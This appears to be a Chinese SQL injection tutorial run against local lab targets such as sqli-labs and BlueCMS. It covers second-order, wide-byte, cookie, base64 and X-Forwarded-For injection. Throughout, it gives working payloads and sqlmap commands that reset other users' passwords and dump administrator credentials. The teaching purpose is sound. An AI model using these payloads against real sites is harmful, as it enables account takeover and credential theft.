在将数据存入到了数据库中之后,开发者就认为数据是可信的。在下一次进行需要进行查询的时候,直接从数据库中取出了脏数据,没有进行下一步的检验和处理,这样就会造成 SQL 的二次注入。比如在第一次插入数据的时候,数据中带有单引号,直接插入到了数据库中;然后在下一次使用中在拼凑的过程中,就形成了二次注入. ### 9.1 源码分析 此处选用靶场sqli-labs第24关 ![image-20250604110533784](01.SQL注入漏洞原理/image-20250604110533784.png) 查看源码 ![image.png](01.SQL注入漏洞原理/1675307508262-888c372a-b874-4cca-a8cd-b2df1b17bc2b.webp) 在login.php源码中查看 ![image.png](01.SQL注入漏洞原理/1675307807133-0ce6790e-2f56-45d7-9016-788cf5b2b8ca.webp) 在pass_change.php中查看源码 ![image.png](01.SQL注入漏洞原理/1675307881746-28a290c8-14dd-4e3b-99e9-9921e20ac486.webp) 开发人员认为session作为服务器上存在的数据,并不是让用户输入的数据就是安全的,但是此处的用户名用户完全可以构造一个sql注入语句,这样在修改密码的时候就可以触发执行了恶意代码。 ### 9.2 注入利用 二次注入判断,一般情况下网站都会对输入的参数进行过滤,后寻找可能会带入恶意数据二次使用的地方。 例如用户注册->修改密码,邮箱注册->修改密码,文章添加->文章编辑。找一切存在二次使用的功能点。 分别注册如下三个用户,密码随意 ```sql a'`,`a' and 1=1#`,`a' and 1=2# ``` 并且尝试修改这三个用户的密码,确认密码是否修改成功,下面是注册后数据库的界面 ```sql mysql> select * from users; +------+-------------+------------+ | id | username | password | +------+-------------+------------+ | 1 | Dumb | Dumb | | 2 | Angelina | I-kill-you | | 3 | Dummy | p@ssword | | 4 | secure | crappy | | 5 | stupid | stupidity | | 6 | superman | genious | | 7 | batman | mob!le | | 8 | admin | admin | | 9 | admin1 | admin1 | | 10 | admin2 | admin2 | | 11 | admin3 | admin3 | | 12 | dhakkan | dumbo | | 14 | admin4 | admin4 | | 1000 | user666 | 123456 | | 1001 | a' | 123123 | | 1002 | a' and 1=1# | 123123 | | 1003 | a' and 1=2# | 123123 | +------+-------------+------------+ 17 rows in set (0.00 sec) ``` ![image.png](01.SQL注入漏洞原理/1675308313180-1599a7f5-b5b2-455a-92d7-9d73eed777e2.webp) 发现如果用户是`a' and 1=2#`密码怎么都修改不成功,跳出来bug提示页面 ![image.png](01.SQL注入漏洞原理/1675308380025-33bb3136-dd7c-4a73-901f-0c297f01fd95.webp) 可以尝试修改其他用户的密码,注册一个用户,用户名为 ```sql a';update users set password='a123456' where username='user888'# ``` 但是,这个案例中username字段限制字符串最长为20,所以并不能够成功 ```sql mysql> select * from users; +------+----------------------+------------+ | id | username | password | +------+----------------------+------------+ ... | 1001 | a' | 123123 | | 1002 | a' and 1=1# | 123123 | | 1003 | a' and 1=2# | 123123 | | 1004 | a';update users set | 123123 | +------+----------------------+------------+ 18 rows in set (0.00 sec) ## 可以看到username限制最长20个字符 mysql> explain users; +----------+-------------+------+-----+---------+----------------+ | Field | Type | Null | Key | Default | Extra | +----------+-------------+------+-----+---------+----------------+ | id | int(3) | NO | PRI | NULL | auto_increment | | username | varchar(20) | NO | | NULL | | | password | varchar(20) | NO | | NULL | | +----------+-------------+------+-----+---------+----------------+ 3 rows in set (0.00 sec) ``` 注册用户`user888`,密码为123456 注册用户`user888'#`,然后修改密码为a123456 ![image-20250604111652150](01.SQL注入漏洞原理/image-20250604111652150.png) 然后发现竟然修改了user888用户的密码,如果user888用户是管理员的话,就可以获取管理员账户 ```sql mysql> select * from users; +------+----------------------+------------+ | id | username | password | +------+----------------------+------------+ ... | 1005 | user888'# | 123456 | | 1006 | user888 | a123456 | +------+----------------------+------------+ 20 rows in set (0.00 sec) ``` ### 9.3 靶场实战 此处选用骑士cms 先注册一个用户 ![image.png](01.SQL注入漏洞原理/1675314751658-b1ae2e8d-dd2f-4ab3-bd5d-a39553b227e7.webp) 在创建简历的地方存在二次注入漏洞,此处可以修改变量的值,并且会存入数据库中 ![image.png](01.SQL注入漏洞原理/1686456633623-e02c6440-0875-4203-8c0e-ae5df4796e1e.webp) 直接暴露了数据库管理员账户 ![image.png](01.SQL注入漏洞原理/1686456757951-0d218445-9577-4879-a460-c900744c7ff0.webp) 查看数据库版本信息 ![image.png](01.SQL注入漏洞原理/1675315210444-e1051101-b0e1-4847-ab57-94662a58e5ef.webp) ## 10. 宽字节注入 宽字节注入,在 SQL 进行防注入的时候,一般会开启 gpc,过滤特殊字符。 一般情况下开启 gpc 是可以防御很多字符串型的注入,但是如果数据库编码不对,也可以导致 SQL 防注入绕过,达到注入的目的。如果数据库设置宽字节字符集 gbk 会导致宽字节注入,从而逃逸 gpc 前提条件 简单理解:数据库编码与 PHP 编码设置为不同的两个编码那么就有可能产生宽字节注入 深入讲解:要有宽字节注入漏洞,首先要满足数据库后端使用双/多字节解析 SQL语句,其次还要保证在该种字符集范围中包含低字节位是 0x5C(01011100) 的字符,初步的测试结果 Big5 和 GBK 字符集都是有的, UTF-8 和 GB2312 没有这种字符(也就不存在宽字节注入)。 gpc 绕过过程 ``` %df%27===(addslashes)===>%df%5c%27===(数据库 GBK)===>運' ``` ### 10.1 源码分析 此处靶场为sqli-labs第32关 从源代码分析,存在漏洞的代码 首先 check_addlashes 是将特殊字符进行过滤将' 变成\' mysql_query 设置数据库的编码为 gbk 将 id 参数传入到 SQL 中带入查询。传入%df%27 即可逃逸 gpc,故存在宽字节注入。 ![image.png](01.SQL注入漏洞原理/1675315573081-bdaf4fae-005f-485b-9657-86c065789c7a.webp) ### 10.2 注入利用 宽字节检测较为简单 输入%df%27 检测即可或者使用配合 and 1=1 检测即可 ![image.png](01.SQL注入漏洞原理/1675315738605-9649ad99-10cb-4bfc-a114-41df04704f50.webp) 查询一下数据库敏感信息 ```sql -1%df' union select 1,version(),database()--+ ``` ![image.png](01.SQL注入漏洞原理/1675315899716-52f5fa89-bf54-43ed-82ac-949b8eeb9cd1.webp) ## 11. Cookie注入 COOKIE 注入与 GET、POST 注入区别不大,只是传递的方式不一样。GET 在url 传递参数、POST 在 协议报文传递参数和值,COOKIE 在 cookie 头传值。 ### 11.1 源码分析 此处靶场为sqli-labs第20关 ![image.png](01.SQL注入漏洞原理/1675316552803-1cde9994-a153-4bc6-916a-53f2fdf3bb81.webp) ### 11.2 注入利用 使用burpsuite抓包,并且修改post提交的数据 在cookie中提交注入代码,1=1和1=2网页内容不一样 ![image.png](01.SQL注入漏洞原理/1675317509007-b094d304-2ca1-44a7-bf0a-0155fa9d8d0a.webp) ![image.png](01.SQL注入漏洞原理/1675317559950-c4c95f59-7fc9-4ee7-8eaa-70bb6f08a313.webp) 使用order by + 联合查询,获取敏感数据 ![image.png](01.SQL注入漏洞原理/1675317638870-3b7772d4-9998-483d-b34e-81f4be7f19e7.webp) ![image.png](01.SQL注入漏洞原理/1675317703340-61120b1d-805d-455c-a593-9667c2c13ad6.webp) 获取当前数据库名 ![image.png](01.SQL注入漏洞原理/1675317752396-57f4fc9a-b079-4155-8cc9-6711371b3f7e.webp) 获取数据表名 ![image.png](01.SQL注入漏洞原理/1675317852942-e4a3c255-f6a8-478f-a8be-248587e42971.webp) 获取字段名 ![image.png](01.SQL注入漏洞原理/1675317911721-0ea9de9e-09d5-4a0d-a27f-8153dab5c200.webp) 获取用户名密码 ![image.png](01.SQL注入漏洞原理/1675318031704-07de7fd8-2276-45ed-a82e-08dd1a7471d4.webp) ### 11.3 注入cms实战 源码下载:http://file.inmind-lab.com:30006/#s/_oOfV4uQ 很多cms会对get和post进行拦截 ![image.png](01.SQL注入漏洞原理/1675318237691-c19bffe8-66f1-47cd-a7ae-a376d53ccc3b.webp) 很多网站对于参数的接受的方法也是比较多的,post也可以传递 ![image.png](01.SQL注入漏洞原理/1675318351865-98a70c4c-5edd-4fbb-a673-b38462a795e8.webp) 不过post数据也会作为过滤重点 ![image.png](01.SQL注入漏洞原理/1675318376847-61e0419a-0733-4058-86cc-10b2ae8688fd.webp) cookie也一样能够提交参数 ![image.png](01.SQL注入漏洞原理/1675318433528-e1236b85-c451-4f99-be90-ff98e2c3db58.webp) 但是cookie却没有做拦截 ![image.png](01.SQL注入漏洞原理/1675318467810-650a9438-af63-47c9-ab76-041fd2e3e088.webp) 使用sqlmap对cookie进行探测,得到服务器相关信息 ```sql sqlmap -u "http://127.0.0.1/shownews.asp" --cookie "id=27" --level 2 ``` ![image.png](01.SQL注入漏洞原理/1675318875547-b32d2513-8cd9-4ad7-9f9b-f56c9d398c7d.webp) 获取数据表名 ```sql sqlmap -u "http://127.0.0.1/shownews.asp" --cookie "id=27" --level 2 --tables ``` ![image.png](01.SQL注入漏洞原理/1675318943562-104bf47f-1a89-4630-af46-2b04b92789f9.webp) 获取字段名 ```sql sqlmap -u "http://127.0.0.1/shownews.asp" --cookie "id=27" --level 2 -T "admin" --columns ``` ![image.png](01.SQL注入漏洞原理/1675319014789-5317558b-451c-465c-b4a3-9d025f32064a.webp) 获取管理员用户名和密码 ```sql sqlmap -u "http://127.0.0.1/shownews.asp" --cookie "id=27" --level 2 -T "admin" -C "username,password" --dump ``` ![image.png](01.SQL注入漏洞原理/1675319288636-31d820e8-93d1-4ade-afc3-055920ecad9a.webp) ## 12. base64编码注入 base64 一般用于数据编码进行传输,例如邮件,也用于图片加密存储在网页中。 数据编码的好处是,防止数据丢失,也有不少网站使用 base64 进行数据传输,如搜索栏 或者 id 接收参数 有可能使用 base64 处理传递的参数。 在 php 中 base64_encode()函数对字符串进行 base64 编码,既然可以编码也可以进行解码,base64_decode()这个函数对 base64 进行解码。 base64 编码注入,可以绕过 gpc 注入拦截,因为编码过后的字符串不存在特殊字符。编码过后的字符串,在程序中重新被解码,再拼接成 SQL 攻击语句,再执行,从而实现 SQL 注入。 ### 12.1 源码分析 此处靶场为sqli-labs第21关 ![image.png](01.SQL注入漏洞原理/1675319580362-f266811a-5fe5-45d9-b831-d48a881fbde0.webp) ### 12.2 注入利用 首先观察网站是否存在 base64 编码的数据,例如传递的 id 的值,搜索模块。 如果存在类似==等,可以用 base64 解码进行测试。 admin'and 1=1-- 编码 YWRtaW4nYW5kIDE9MS0tIA== admin'and 1=2-- 编码 YWRtaW4nYW5kIDE9Mi0tIA== 本次测试的页面是 cookie 所以需要 cookie 提交 而且有括号需要闭合 ![image.png](01.SQL注入漏洞原理/1675320624622-ae7e06e2-8785-4480-b8bf-765a79c2025f.webp) ![image.png](01.SQL注入漏洞原理/1675320651113-d821a230-dd4f-4ade-a77e-743f0604c7a9.webp) ![image.png](01.SQL注入漏洞原理/1675320680784-967f5876-11af-46d9-ad84-caa3e6e8c13d.webp) 使用报错注入也可以 ```sql uname=admin') and (updatexml(1,concat(0x7e,(select user()),0x7e),1))-- ``` ![image.png](01.SQL注入漏洞原理/1675320804909-05c6cd25-20e8-4536-90e9-9062cb6d7b93.webp) ## 13. xff注入 X-Forwarded-For 简称 XFF 头,它代表了客户端的真实 IP,通过修改他的值就可以伪造客户端 IP。XFF 并不受 gpc 影响,而且开发人员很容易忽略这个 XFF 头,不会对 XFF 头进行过滤。 除了 X-Forwarded-For 还有 HTTP_CLIENT_IP 都可以由客户端控制值,所以服务端接受这两个参数的时候 没有过滤会造成 SQL 注入或者更高的危害。 ### 13.1 注入cms实战 此处靶场为bluecms 在大部分需要提交信息的网站上,记录IP地址是必须的,即使HTTP头部没有X-Forwarded-For或者client-ip也会被记录,所以手动添加在很多时候也是可行的。 ![image.png](01.SQL注入漏洞原理/1675321067548-996651a2-f47c-4b03-95e9-b2a3db971f6a.webp) ![image.png](01.SQL注入漏洞原理/1675321191041-bc996b6c-fc22-4803-92c5-ef567ab2096c.webp) 分析报错的原始sql语句,其中123是提交的评论内容 ```sql INSERT INTO blue_comment (com_id, post_id, user_id, type, mood, content, pub_date, ip, is_check) VALUES ('', '4', '0', '1', '1', '123', '1675321172', '1.1.1.1'', '1') ``` 我们可以闭合标签,追加一行内容,下面的内容中,第2行就是要加入的注入语句,这样就可以将我们想查询的内容以评论的方式留在网页上 ```sql INSERT INTO blue_comment (com_id, post_id, user_id, type, mood, content, pub_date, ip, is_check) VALUES ('', '4', '0', '1', '1', '123', '1675321172', ' 1.1.1.1', '1'),('', '4', '0', '1', '1', (select concat(admin_name,0x3a,pwd) from blue_admin limit 0,1), '1675321172', '1.1.1.1', '1')# ``` ![image.png](01.SQL注入漏洞原理/1675321737942-4c8b7f06-16ea-4686-8bcd-7bbf80e70044.webp) 使用sqlmap对http头部进行注入,指定注入点,将内容保存到记事本中 ![image.png](01.SQL注入漏洞原理/1675321782240-c38de719-8e01-4346-b77f-b6513614ab68.webp) ```sql sqlmap -r C:\Users\simid\Desktop\p.txt --batch --tables -D d6_s_iproute_cn ``` ![image.png](01.SQL注入漏洞原理/1675322643412-d06a3ed0-a6a0-4c08-b9a4-dd38cdc0e045.webp)